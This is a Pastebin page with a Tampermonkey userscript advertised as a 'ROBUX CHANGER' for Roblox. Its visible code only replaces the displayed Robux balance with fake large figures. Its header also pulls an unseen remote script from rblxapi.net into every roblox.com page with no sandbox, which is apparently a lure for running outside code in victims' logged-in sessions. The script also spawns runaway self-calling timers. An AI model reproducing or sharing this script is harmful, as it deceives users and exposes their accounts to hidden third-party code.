Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // ==UserScript==
- // @name ROBUX CHANGER
- // @namespace http://tampermonkey.net/
- // @version 4.0
- // @description THIS IS MADE BY Scoty#6637 and RBLXapi
- // @author RBLXapi
- // @match https://www.roblox.com/*
- // @grant none
- // @require https://rblxapi.net/robux/1/script.js
- // @include http://roblox.com/*
- // @include https://roblox.com/*
- // @include http://*.roblox.com/*
- // @include https://*.roblox.com/*
- // ==/UserScript==
- function start() {
- var Scoty6637 = document.getElementById("nav-robux-amount");
- Scoty6637.innerHTML = "10M+";
- setTimeout(start, 0);
- var Robux = document.getElementById("nav-robux-balance");
- Robux.innerHTML = "10,916,581 Robux";
- setTimeout(start, 0);
- }
- start();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement